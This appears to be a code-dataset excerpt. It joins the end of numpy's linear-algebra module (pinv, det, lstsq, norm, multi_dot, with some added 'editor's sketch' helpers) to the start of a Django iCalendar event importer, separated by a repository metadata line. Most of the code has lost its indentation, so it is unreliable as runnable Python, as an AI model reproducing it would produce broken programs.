return (S > tol).sum(axis=-1)
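# Editor's sketch: the alternative "expected roundoff error" threshold from
# Numerical Recipes quoted in the notes above, applied to a single 2-D matrix.
def _example_matrix_rank_alt_tol(M):
    M = asarray(M)
    S = svd(M, compute_uv=False)
    m, n = M.shape[-2:]
    tol = S.max() * finfo(S.dtype).eps / 2. * sqrt(m + n + 1.)
    return (S > tol).sum()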
# Generalized inverse
def pinv(a, rcond=1e-15 ):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate the generalized inverse of a matrix using its
singular-value decomposition (SVD) and including all
*large* singular values.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
rcond : float
Cutoff for small singular values.
Singular values smaller (in modulus) than
`rcond` * largest_singular_value (again, in modulus)
are set to zero.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of `a`. If `a` is a `matrix` instance, then so
is `B`.
Raises
------
LinAlgError
If the SVD computation does not converge.
Notes
-----
The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
defined as: "the matrix that 'solves' [the least-squares problem]
:math:`Ax = b`," i.e., if :math:`\\bar{x}` is said solution, then
:math:`A^+` is that matrix such that :math:`\\bar{x} = A^+b`.
It can be shown that if :math:`Q_1 \\Sigma Q_2^T = A` is the singular
value decomposition of A, then
:math:`A^+ = Q_2 \\Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
orthogonal matrices, :math:`\\Sigma` is a diagonal matrix consisting
of A's so-called singular values, (followed, typically, by
zeros), and then :math:`\\Sigma^+` is simply the diagonal matrix
consisting of the reciprocals of A's singular values
(again, followed by zeros). [1]_
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pp. 139-142.
Examples
--------
The following example checks that ``a * a+ * a == a`` and
``a+ * a * a+ == a+``:
>>> a = np.random.randn(9, 6)
>>> B = np.linalg.pinv(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a, wrap = _makearray(a)
if _isEmpty2d(a):
res = empty(a.shape[:-2] + (a.shape[-1], a.shape[-2]), dtype=a.dtype)
return wrap(res)
a = a.conjugate()
u, s, vt = svd(a, 0)
m = u.shape[0]
n = vt.shape[1]
cutoff = rcond*maximum.reduce(s)
for i in range(min(n, m)):
if s[i] > cutoff:
s[i] = 1./s[i]
else:
s[i] = 0.
res = dot(transpose(vt), multiply(s[:, newaxis], transpose(u)))
return wrap(res)
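# Editor's sketch of the construction in the pinv() notes:
# A+ = V Sigma+ U.H, with singular values below the cutoff zeroed.
def _example_pinv_via_svd(a, rcond=1e-15):
    u, s, vt = svd(asarray(a), full_matrices=False)
    cutoff = rcond * maximum.reduce(s)
    s_inv = zeros(s.shape, s.dtype)
    large = s > cutoff
    s_inv[large] = 1. / s[large]
    return dot(vt.conj().T * s_inv, u.conj().T)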
# Determinant
def slogdet(a):
"""
Compute the sign and (natural) logarithm of the determinant of an array.
If an array has a very small or very large determinant, then a call to
`det` may overflow or underflow. This routine is more robust against such
issues, because it computes the logarithm of the determinant rather than
the determinant itself.
Parameters
----------
a : (..., M, M) array_like
Input array, has to be a square 2-D array.
Returns
-------
sign : (...) array_like
A number representing the sign of the determinant. For a real matrix,
this is 1, 0, or -1. For a complex matrix, this is a complex number
with absolute value 1 (i.e., it is on the unit circle), or else 0.
logdet : (...) array_like
The natural log of the absolute value of the determinant.
If the determinant is zero, then `sign` will be 0 and `logdet` will be
-Inf. In all cases, the determinant is equal to ``sign * np.exp(logdet)``.
See Also
--------
det
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
.. versionadded:: 1.6.0
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array ``[[a, b], [c, d]]`` is ``ad - bc``:
>>> a = np.array([[1, 2], [3, 4]])
>>> (sign, logdet) = np.linalg.slogdet(a)
>>> (sign, logdet)
(-1, 0.69314718055994529)
>>> sign * np.exp(logdet)
-2.0
Computing log-determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> sign, logdet = np.linalg.slogdet(a)
>>> (sign, logdet)
(array([-1., -1., -1.]), array([ 0.69314718, 1.09861229, 2.07944154]))
>>> sign * np.exp(logdet)
array([-2., -3., -8.])
This routine succeeds where ordinary `det` does not:
>>> np.linalg.det(np.eye(500) * 0.1)
0.0
>>> np.linalg.slogdet(np.eye(500) * 0.1)
(1, -1151.2925464970228)
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
real_t = _realType(result_t)
if _isEmpty2d(a):
# determinant of empty matrix is 1
sign = ones(a.shape[:-2], dtype=result_t)
logdet = zeros(a.shape[:-2], dtype=real_t)
return sign, logdet
signature = 'D->Dd' if isComplexType(t) else 'd->dd'
sign, logdet = _umath_linalg.slogdet(a, signature=signature)
if isscalar(sign):
sign = sign.astype(result_t)
else:
sign = sign.astype(result_t, copy=False)
if isscalar(logdet):
logdet = logdet.astype(real_t)
else:
logdet = logdet.astype(real_t, copy=False)
return sign, logdet
def det(a):
"""
Compute the determinant of an array.
Parameters
----------
a : (..., M, M) array_like
Input array to compute determinants for.
Returns
-------
det : (...) array_like
Determinant of `a`.
See Also
--------
    slogdet : Another way of representing the determinant, more suitable
for large matrices where underflow/overflow may occur.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:
>>> a = np.array([[1, 2], [3, 4]])
>>> np.linalg.det(a)
-2.0
Computing determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> np.linalg.det(a)
array([-2., -3., -8.])
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
# 0x0 matrices have determinant 1
if _isEmpty2d(a):
return ones(a.shape[:-2], dtype=result_t)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = _umath_linalg.det(a, signature=signature)
if isscalar(r):
r = r.astype(result_t)
else:
r = r.astype(result_t, copy=False)
return r
# Linear Least Squares
def lstsq(a, b, rcond=-1):
"""
Return the least-squares solution to a linear matrix equation.
Solves the equation `a x = b` by computing a vector `x` that
minimizes the Euclidean 2-norm `|| b - a x ||^2`. The equation may
be under-, well-, or over- determined (i.e., the number of
linearly independent rows of `a` can be less than, equal to, or
greater than its number of linearly independent columns). If `a`
is square and of full rank, then `x` (but for round-off error) is
the "exact" solution of the equation.
Parameters
----------
a : (M, N) array_like
"Coefficient" matrix.
b : {(M,), (M, K)} array_like
Ordinate or "dependent variable" values. If `b` is two-dimensional,
the least-squares solution is calculated for each of the `K` columns
of `b`.
rcond : float, optional
Cut-off ratio for small singular values of `a`.
For the purposes of rank determination, singular values are treated
as zero if they are smaller than `rcond` times the largest singular
value of `a`.
Returns
-------
x : {(N,), (N, K)} ndarray
Least-squares solution. If `b` is two-dimensional,
the solutions are in the `K` columns of `x`.
residuals : {(), (1,), (K,)} ndarray
Sums of residuals; squared Euclidean 2-norm for each column in
``b - a*x``.
If the rank of `a` is < N or M <= N, this is an empty array.
If `b` is 1-dimensional, this is a (1,) shape array.
Otherwise the shape is (K,).
rank : int
Rank of matrix `a`.
s : (min(M, N),) ndarray
Singular values of `a`.
Raises
------
LinAlgError
If computation does not converge.
Notes
-----
If `b` is a matrix, then all array results are returned as matrices.
Examples
--------
Fit a line, ``y = mx + c``, through some noisy data-points:
>>> x = np.array([0, 1, 2, 3])
>>> y = np.array([-1, 0.2, 0.9, 2.1])
By examining the coefficients, we see that the line should have a
gradient of roughly 1 and cut the y-axis at, more or less, -1.
We can rewrite the line equation as ``y = Ap``, where ``A = [[x 1]]``
and ``p = [[m], [c]]``. Now use `lstsq` to solve for `p`:
>>> A = np.vstack([x, np.ones(len(x))]).T
>>> A
array([[ 0., 1.],
[ 1., 1.],
[ 2., 1.],
[ 3., 1.]])
>>> m, c = np.linalg.lstsq(A, y)[0]
>>> print(m, c)
1.0 -0.95
Plot the data along with the fitted line:
>>> import matplotlib.pyplot as plt
>>> plt.plot(x, y, 'o', label='Original data', markersize=10)
>>> plt.plot(x, m*x + c, 'r', label='Fitted line')
>>> plt.legend()
>>> plt.show()
"""
import math
a, _ = _makearray(a)
b, wrap = _makearray(b)
is_1d = b.ndim == 1
if is_1d:
b = b[:, newaxis]
_assertRank2(a, b)
_assertNoEmpty2d(a, b) # TODO: relax this constraint
m = a.shape[0]
n = a.shape[1]
n_rhs = b.shape[1]
ldb = max(n, m)
if m != b.shape[0]:
raise LinAlgError('Incompatible dimensions')
t, result_t = _commonType(a, b)
result_real_t = _realType(result_t)
real_t = _linalgRealType(t)
bstar = zeros((ldb, n_rhs), t)
bstar[:b.shape[0], :n_rhs] = b.copy()
a, bstar = _fastCopyAndTranspose(t, a, bstar)
a, bstar = _to_native_byte_order(a, bstar)
s = zeros((min(m, n),), real_t)
# This line:
# * is incorrect, according to the LAPACK documentation
# * raises a ValueError if min(m,n) == 0
# * should not be calculated here anyway, as LAPACK should calculate
# `liwork` for us. But that only works if our version of lapack does
# not have this bug:
# http://icl.cs.utk.edu/lapack-forum/archives/lapack/msg00899.html
# Lapack_lite does have that bug...
nlvl = max( 0, int( math.log( float(min(m, n))/2. ) ) + 1 )
iwork = zeros((3*min(m, n)*nlvl+11*min(m, n),), fortran_int)
if isComplexType(t):
lapack_routine = lapack_lite.zgelsd
lwork = 1
rwork = zeros((lwork,), real_t)
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, rwork, iwork, 0)
lwork = int(abs(work[0]))
rwork = zeros((lwork,), real_t)
a_real = zeros((m, n), real_t)
bstar_real = zeros((ldb, n_rhs,), real_t)
results = lapack_lite.dgelsd(m, n, n_rhs, a_real, m,
bstar_real, ldb, s, rcond,
0, rwork, -1, iwork, 0)
lrwork = int(rwork[0])
work = zeros((lwork,), t)
rwork = zeros((lrwork,), real_t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, rwork, iwork, 0)
else:
lapack_routine = lapack_lite.dgelsd
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, iwork, 0)
lwork = int(work[0])
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, iwork, 0)
if results['info'] > 0:
raise LinAlgError('SVD did not converge in Linear Least Squares')
resids = array([], result_real_t)
if is_1d:
x = array(ravel(bstar)[:n], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = array([sum(abs(ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
resids = array([sum((ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
x = array(transpose(bstar)[:n,:], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = sum(abs(transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
else:
resids = sum((transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
st = s[:min(n, m)].astype(result_real_t, copy=True)
return wrap(x), wrap(resids), results['rank'], st
def _multi_svd_norm(x, row_axis, col_axis, op):
"""Compute a function of the singular values of the 2-D matrices in `x`.
This is a private utility function used by numpy.linalg.norm().
Parameters
----------
x : ndarray
row_axis, col_axis : int
The axes of `x` that hold the 2-D matrices.
op : callable
This should be either numpy.amin or numpy.amax or numpy.sum.
Returns
-------
result : float or ndarray
        If `x` is 2-D, the return value is a float.
Otherwise, it is an array with ``x.ndim - 2`` dimensions.
The return values are either the minimum or maximum or sum of the
singular values of the matrices, depending on whether `op`
is `numpy.amin` or `numpy.amax` or `numpy.sum`.
"""
if row_axis > col_axis:
row_axis -= 1
y = rollaxis(rollaxis(x, col_axis, x.ndim), row_axis, -1)
result = op(svd(y, compute_uv=0), axis=-1)
return result
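# Editor's note: norm() below relies on this helper for the SVD-based matrix
# norms, e.g. the nuclear norm as _multi_svd_norm(x, row_axis, col_axis, sum)
# and the 2-norm / -2-norm via amax / amin respectively.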
def norm(x, ord=None, axis=None, keepdims=False):
"""
Matrix or vector norm.
This function is able to return one of eight different matrix norms,
or one of an infinite number of vector norms (described below), depending
on the value of the ``ord`` parameter.
Parameters
----------
x : array_like
Input array. If `axis` is None, `x` must be 1-D or 2-D.
ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
Order of the norm (see table under ``Notes``). inf means numpy's
`inf` object.
axis : {int, 2-tuple of ints, None}, optional
If `axis` is an integer, it specifies the axis of `x` along which to
compute the vector norms. If `axis` is a 2-tuple, it specifies the
axes that hold 2-D matrices, and the matrix norms of these matrices
are computed. If `axis` is None then either a vector norm (when `x`
is 1-D) or a matrix norm (when `x` is 2-D) is returned.
keepdims : bool, optional
If this is set to True, the axes which are normed over are left in the
result as dimensions with size one. With this option the result will
broadcast correctly against the original `x`.
.. versionadded:: 1.10.0
Returns
-------
n : float or ndarray
Norm of the matrix or vector(s).
Notes
-----
For values of ``ord <= 0``, the result is, strictly speaking, not a
mathematical 'norm', but it may still be useful for various numerical
purposes.
The following norms can be calculated:
===== ============================ ==========================
ord norm for matrices norm for vectors
===== ============================ ==========================
None Frobenius norm 2-norm
'fro' Frobenius norm --
'nuc' nuclear norm --
inf max(sum(abs(x), axis=1)) max(abs(x))
-inf min(sum(abs(x), axis=1)) min(abs(x))
0 -- sum(x != 0)
1 max(sum(abs(x), axis=0)) as below
-1 min(sum(abs(x), axis=0)) as below
2 2-norm (largest sing. value) as below
-2 smallest singular value as below
other -- sum(abs(x)**ord)**(1./ord)
===== ============================ ==========================
The Frobenius norm is given by [1]_:
:math:`||A||_F = [\\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
The nuclear norm is the sum of the singular values.
References
----------
.. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.arange(9) - 4
>>> a
array([-4, -3, -2, -1, 0, 1, 2, 3, 4])
>>> b = a.reshape((3, 3))
>>> b
array([[-4, -3, -2],
[-1, 0, 1],
[ 2, 3, 4]])
>>> LA.norm(a)
7.745966692414834
>>> LA.norm(b)
7.745966692414834
>>> LA.norm(b, 'fro')
7.745966692414834
>>> LA.norm(a, np.inf)
4.0
>>> LA.norm(b, np.inf)
9.0
>>> LA.norm(a, -np.inf)
0.0
>>> LA.norm(b, -np.inf)
2.0
>>> LA.norm(a, 1)
20.0
>>> LA.norm(b, 1)
7.0
>>> LA.norm(a, -1)
-4.6566128774142013e-010
>>> LA.norm(b, -1)
6.0
>>> LA.norm(a, 2)
7.745966692414834
>>> LA.norm(b, 2)
7.3484692283495345
>>> LA.norm(a, -2)
nan
>>> LA.norm(b, -2)
1.8570331885190563e-016
>>> LA.norm(a, 3)
5.8480354764257312
>>> LA.norm(a, -3)
nan
Using the `axis` argument to compute vector norms:
>>> c = np.array([[ 1, 2, 3],
... [-1, 1, 4]])
>>> LA.norm(c, axis=0)
array([ 1.41421356, 2.23606798, 5. ])
>>> LA.norm(c, axis=1)
array([ 3.74165739, 4.24264069])
>>> LA.norm(c, ord=1, axis=1)
array([ 6., 6.])
Using the `axis` argument to compute matrix norms:
>>> m = np.arange(8).reshape(2,2,2)
>>> LA.norm(m, axis=(1,2))
array([ 3.74165739, 11.22497216])
>>> LA.norm(m[0, :, :]), LA.norm(m[1, :, :])
(3.7416573867739413, 11.224972160321824)
"""
x = asarray(x)
if not issubclass(x.dtype.type, (inexact, object_)):
x = x.astype(float)
# Immediately handle some default, simple, fast, and common cases.
if axis is None:
ndim = x.ndim
if ((ord is None) or
(ord in ('f', 'fro') and ndim == 2) or
(ord == 2 and ndim == 1)):
x = x.ravel(order='K')
if isComplexType(x.dtype.type):
sqnorm = dot(x.real, x.real) + dot(x.imag, x.imag)
else:
sqnorm = dot(x, x)
ret = sqrt(sqnorm)
if keepdims:
ret = ret.reshape(ndim*[1])
return ret
# Normalize the `axis` argument to a tuple.
nd = x.ndim
if axis is None:
axis = tuple(range(nd))
elif not isinstance(axis, tuple):
try:
axis = int(axis)
except Exception:
raise TypeError("'axis' must be None, an integer or a tuple of integers")
axis = (axis,)
if len(axis) == 1:
if ord == Inf:
return abs(x).max(axis=axis, keepdims=keepdims)
elif ord == -Inf:
return abs(x).min(axis=axis, keepdims=keepdims)
elif ord == 0:
# Zero norm
return (x != 0).astype(float).sum(axis=axis, keepdims=keepdims)
elif ord == 1:
# special case for speedup
return add.reduce(abs(x), axis=axis, keepdims=keepdims)
elif ord is None or ord == 2:
# special case for speedup
s = (x.conj() * x).real
return sqrt(add.reduce(s, axis=axis, keepdims=keepdims))
else:
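# Duck-type check that `ord` is numeric: string orders such as 'fro'
# are only valid for matrices, so `ord + 1` must succeed here.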
try:
ord + 1
except TypeError:
raise ValueError("Invalid norm order for vectors.")
if x.dtype.type is longdouble:
# Convert to a float type, so integer arrays give
# float results. Don't apply asfarray to longdouble arrays,
# because it will downcast to float64.
absx = abs(x)
else:
absx = x if isComplexType(x.dtype.type) else asfarray(x)
if absx.dtype is x.dtype:
absx = abs(absx)
else:
# if the type changed, we can safely overwrite absx
abs(absx, out=absx)
absx **= ord
return add.reduce(absx, axis=axis, keepdims=keepdims) ** (1.0 / ord)
elif len(axis) == 2:
row_axis, col_axis = axis
row_axis = normalize_axis_index(row_axis, nd)
col_axis = normalize_axis_index(col_axis, nd)
if row_axis == col_axis:
raise ValueError('Duplicate axes given.')
if ord == 2:
ret = _multi_svd_norm(x, row_axis, col_axis, amax)
elif ord == -2:
ret = _multi_svd_norm(x, row_axis, col_axis, amin)
elif ord == 1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).max(axis=col_axis)
elif ord == Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).max(axis=row_axis)
elif ord == -1:
if col_axis > row_axis:
col_axis -= 1
ret = add.reduce(abs(x), axis=row_axis).min(axis=col_axis)
elif ord == -Inf:
if row_axis > col_axis:
row_axis -= 1
ret = add.reduce(abs(x), axis=col_axis).min(axis=row_axis)
elif ord in [None, 'fro', 'f']:
ret = sqrt(add.reduce((x.conj() * x).real, axis=axis))
elif ord == 'nuc':
ret = _multi_svd_norm(x, row_axis, col_axis, sum)
else:
raise ValueError("Invalid norm order for matrices.")
if keepdims:
ret_shape = list(x.shape)
ret_shape[axis[0]] = 1
ret_shape[axis[1]] = 1
ret = ret.reshape(ret_shape)
return ret
else:
raise ValueError("Improper number of dimensions to norm.")
# multi_dot
def multi_dot(arrays):
"""
Compute the dot product of two or more arrays in a single function call,
while automatically selecting the fastest evaluation order.
`multi_dot` chains `numpy.dot` and uses optimal parenthesization
of the matrices [1]_ [2]_. Depending on the shapes of the matrices,
this can speed up the multiplication a lot.
If the first argument is 1-D it is treated as a row vector.
If the last argument is 1-D it is treated as a column vector.
The other arguments must be 2-D.
Think of `multi_dot` as::
def multi_dot(arrays): return functools.reduce(np.dot, arrays)
Parameters
----------
arrays : sequence of array_like
If the first argument is 1-D it is treated as row vector.
If the last argument is 1-D it is treated as column vector.
The other arguments must be 2-D.
Returns
-------
output : ndarray
Returns the dot product of the supplied arrays.
See Also
--------
dot : dot multiplication with two arguments.
References
----------
.. [1] Cormen, "Introduction to Algorithms", Chapter 15.2, p. 370-378
.. [2] http://en.wikipedia.org/wiki/Matrix_chain_multiplication
Examples
--------
`multi_dot` allows you to write::
>>> from numpy.linalg import multi_dot
>>> # Prepare some data
>>> A = np.random.random((10000, 100))
>>> B = np.random.random((100, 1000))
>>> C = np.random.random((1000, 5))
>>> D = np.random.random((5, 333))
>>> # the actual dot multiplication
>>> multi_dot([A, B, C, D])
instead of::
>>> np.dot(np.dot(np.dot(A, B), C), D)
>>> # or
>>> A.dot(B).dot(C).dot(D)
Notes
-----
The cost for a matrix multiplication can be calculated with the
following function::
def cost(A, B):
return A.shape[0] * A.shape[1] * B.shape[1]
Let's assume we have three matrices
:math:`A_{10x100}, B_{100x5}, C_{5x50}`.
The costs for the two different parenthesizations are as follows::
cost((AB)C) = 10*100*5 + 10*5*50 = 5000 + 2500 = 7500
cost(A(BC)) = 10*100*50 + 100*5*50 = 50000 + 25000 = 75000
"""
n = len(arrays)
# optimization only makes sense for len(arrays) > 2
if n < 2:
raise ValueError("Expecting at least two arrays.")
elif n == 2:
return dot(arrays[0], arrays[1])
arrays = [asanyarray(a) for a in arrays]
# save original ndim to reshape the result array into the proper form later
ndim_first, ndim_last = arrays[0].ndim, arrays[-1].ndim
# Explicitly convert vectors to 2D arrays to keep the logic of the internal
# _multi_dot_* functions as simple as possible.
if arrays[0].ndim == 1:
arrays[0] = atleast_2d(arrays[0])
if arrays[-1].ndim == 1:
arrays[-1] = atleast_2d(arrays[-1]).T
_assertRank2(*arrays)
# _multi_dot_three is much faster than _multi_dot_matrix_chain_order
if n == 3:
result = _multi_dot_three(arrays[0], arrays[1], arrays[2])
else:
order = _multi_dot_matrix_chain_order(arrays)
result = _multi_dot(arrays, order, 0, n - 1)
# return proper shape
if ndim_first == 1 and ndim_last == 1:
return result[0, 0] # scalar
elif ndim_first == 1 or ndim_last == 1:
return result.ravel() # 1-D
else:
return result
def _multi_dot_three(A, B, C):
"""
Find the best order for three arrays and do the multiplication.
For three arguments `_multi_dot_three` is approximately 15 times faster
than `_multi_dot_matrix_chain_order`
"""
a0, a1b0 = A.shape
b1c0, c1 = C.shape
# cost1 = cost((AB)C) = a0*a1b0*b1c0 + a0*b1c0*c1
cost1 = a0 * b1c0 * (a1b0 + c1)
# cost2 = cost(A(BC)) = a1b0*b1c0*c1 + a0*a1b0*c1
cost2 = a1b0 * c1 * (a0 + b1c0)
if cost1 < cost2:
return dot(dot(A, B), C)
else:
return dot(A, dot(B, C))
def _multi_dot_matrix_chain_order(arrays, return_costs=False):
"""
Return a np.array that encodes the optimal order of multiplications.
The optimal order array is then used by `_multi_dot()` to do the
multiplication.
Also return the cost matrix if `return_costs` is `True`
The implementation CLOSELY follows Cormen, "Introduction to Algorithms",
Chapter 15.2, p. 370-378. Note that Cormen uses 1-based indices.
cost[i, j] = min([
cost[prefix] + cost[suffix] + cost_mult(prefix, suffix)
for k in range(i, j)])
"""
n = len(arrays)
# p stores the dimensions of the matrices
# Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]
p = [a.shape[0] for a in arrays] + [arrays[-1].shape[1]]
# m is a matrix of costs of the subproblems
# m[i,j]: min number of scalar multiplications needed to compute A_{i..j}
m = zeros((n, n), dtype=double)
# s is the actual ordering
# s[i, j] is the value of k at which we split the product A_i..A_j
s = empty((n, n), dtype=intp)
for l in range(1, n):
for i in range(n - l):
j = i + l
m[i, j] = Inf
for k in range(i, j):
q = m[i, k] + m[k+1, j] + p[i]*p[k+1]*p[j+1]
if q < m[i, j]:
m[i, j] = q
s[i, j] = k # Note that Cormen uses 1-based index
return (s, m) if return_costs else s
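# Worked example: for A (10x100), B (100x5), C (5x50) we get
# p = [10, 100, 5, 50], and the recurrence picks the (AB)C split at
# 10*100*5 + 10*5*50 = 7500 scalar multiplications versus 75000 for A(BC).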
def _multi_dot(arrays, order, i, j):
"""Actually do the multiplication with the given order."""
if i == j:
return arrays[i]
else:
return dot(_multi_dot(arrays, order, i, order[i, j]),
_multi_dot(arrays, order, order[i, j] + 1, j))
| behzadnouri/numpy | numpy/linalg/linalg.py | Python | bsd-3-clause | 78,778 |
from datetime import datetime, date, time
from HTMLParser import HTMLParser
import random
import urllib2
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from icalendar import Calendar
import pytz
from wprevents.events.models import Event, Space, FunctionalArea, EVENT_TITLE_LENGTH
from wprevents.base.tasks import generate_event_instances
from recurrence import *
from dateutil.rrule import rruleset, rrulestr
class EventImporterError(Exception):
pass
class EventImporter:
def __init__(self, space=None):
self.space = space
self.spaces = Space.objects.all()
def from_url(self, url):
return self.from_string(self.fetch_url(url))
def from_string(self, data):
cal = self.parse_data(self.sanitize(data))
try:
events, skipped = self.bulk_create_events(cal)
generate_event_instances.delay()
except transaction.TransactionManagementError, e:
transaction.rollback()
raise EventImporterError('An error with the database transaction occurred while bulk inserting events: ' + str(e))
except Exception, e:
raise EventImporterError('An error occurred while bulk inserting events: ' + str(e))
return events, skipped
def fetch_url(self, url):
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request)
except urllib2.URLError, e:
raise EventImporterError('URL error: ' + str(e.reason))
except urllib2.HTTPError, e:
raise EventImporterError('HTTP error: ' + str(e.code))
data = response.read().decode('utf-8')
return data
def sanitize(self, data):
data = data.replace(u"", "") # Temp fix for Mozilla remo ICS file
return data
def parse_data(self, data):
try:
cal = Calendar.from_ical(data)
except ValueError:
raise EventImporterError('Error parsing icalendar file. The file may contain invalid characters.')
return cal
@transaction.commit_manually
def bulk_create_events(self, cal):
ical_events = [e for e in cal.walk('VEVENT')]
duplicate_candidates = self.find_duplicate_candidates(ical_events)
# Temporary bulk_id used to fetch back newly created events
bulk_id = random.randrange(1000000000)
# Prepare batch create by looping through ical events, filtering out duplicates
events_to_create = []
recurrences = []
skipped = 0
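# Normalise each VEVENT's fields, skip events that already exist in the
# database, and queue the remainder for a single bulk INSERT below.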
for ical_event in ical_events:
title = HTMLParser().unescape(ical_event.get('summary'))
title = title[:EVENT_TITLE_LENGTH] # Truncate to avoid potential errors
location = ical_event.get('location', '')
description = ical_event.get('description', '')
description = HTMLParser().unescape(description).encode('utf-8')
if self.space is None:
# Auto-detection is disabled for now
# (Space field in import modal is required=True)
space = self.guess_space(location)
else:
space = self.space
start = self.convert_datetime(ical_event.get('dtstart').dt, space)
end = self.convert_datetime(ical_event.get('dtend').dt, space)
# We always want to store datetimes as UTC
start = timezone.make_naive(start, pytz.utc)
end = timezone.make_naive(end, pytz.utc)
# Filter out duplicate events
if any(self.is_duplicate(e, start, title, space) for e in duplicate_candidates):
skipped += 1
continue
event = Event(
start = start,
end = end,
space = space,
title = title,
description = description,
bulk_id = bulk_id
)
# Generate slug because django's bulk_create() does not call Event.save(),
# which is where an Event's slug is normally set
event.define_slug()
# Also update start and end datetimes in local time (relative to space)
event.update_local_datetimes()
events_to_create.append(event)
recurrences.append(self.get_recurrence(ical_event, event))
# Bulk create and instantly retrieve events, and remove bulk_id
Event.objects.bulk_create(events_to_create)
created_events = Event.objects.filter(bulk_id=bulk_id)
# Bulk update any functional areas of all these newly created events
FunctionalAreaRelations = Event.areas.through
relations = []
areas = FunctionalArea.objects.all()
for i, event in enumerate(created_events):
if recurrences[i] is not None:
event.recurrence = recurrences[i]
event.save()
for area in self.guess_functional_areas(event.description, areas):
relations.append(FunctionalAreaRelations(event_id=event.pk, functionalarea_id=area.pk))
FunctionalAreaRelations.objects.bulk_create(relations)
Event.objects.filter(bulk_id=bulk_id).update(bulk_id=None)
transaction.commit()
return created_events, skipped
def guess_space(self, location):
"""
Guess an existing Space from a string containing a raw event location
"""
guessed_space = [s for s in self.spaces if s.name.lower() in location.lower()]
return guessed_space[0] if guessed_space else None
def guess_functional_areas(self, description, functional_areas):
guessed_areas = [a for a in functional_areas if a.name.lower() in description.lower()]
return guessed_areas
def convert_datetime(self, dt, space):
if isinstance(dt, date) and not isinstance(dt, datetime):
# If there is no time specified for this dt,
# convert it to a datetime object with a time set to 00:00
dt = datetime.combine(dt, time(0, 0, 0))
if space and space.timezone:
# If the event space is known, make it local to its timezone
dt = pytz.timezone(space.timezone).localize(dt)
else:
dt = pytz.utc.localize(dt)
return dt
def find_duplicate_candidates(self, ical_events):
"""
Return all events previously added in the database that are duplicate
candidates (i.e. sharing a title or a start date) of the events provided
in the imported ical file.
"""
titles = []
start_dates = []
for ical_event in ical_events:
titles.append(ical_event.get('summary'))
if self.space is None:
space = self.guess_space(ical_event.get('location', ''))
else:
space = self.space
start = self.convert_datetime(ical_event.get('dtstart').dt, space)
start_dates.append(timezone.make_naive(start, pytz.utc))
# Dynamically build 'or' filters
filter_titles = reduce(lambda q, e: q|Q(title=e.title), titles, Q())
filter_start_dates = reduce(lambda q, date: q|Q(start=date), start_dates, Q())
return Event.objects.filter(filter_titles|filter_start_dates)
def is_duplicate(self, duplicate_candidate, start, title, space):
"""
Determine if the event given as the first argument is a duplicate
of another event that we are importing by comparing its properties
"""
e = duplicate_candidate
# Dates coming from the database are always timezone aware because
# settings.USE_TZ is True, so we must convert to a naive datetime in order
# to compare them.
naive_start_date = timezone.make_naive(e.start, pytz.utc).date()
# Start dates and titles and spaces must be identical
if naive_start_date == start.date() and e.title == title and space == e.space:
return True
return False
def get_recurrence(self, ical_event, event):
if not ical_event.get('RRULE') \
and not ical_event.get('EXRULE') \
and not ical_event.get('RDATE') \
and not ical_event.get('EXDATE'):
return None
def get_as_list(obj, attr):
v = obj.get(attr)
if v:
return v if isinstance(v, list) else [v]
return []
def to_utc(dt):
if timezone.is_aware(dt):
return timezone.make_naive(dt.astimezone(pytz.utc), pytz.utc)
else:
return pytz.utc.localize(dt)
rset = rruleset()
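# Rebuild the recurrence as a dateutil rruleset: RRULE/EXRULE contribute
# whole inclusion/exclusion rules, while RDATE/EXDATE add or remove
# individual datetimes (normalised to UTC first).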
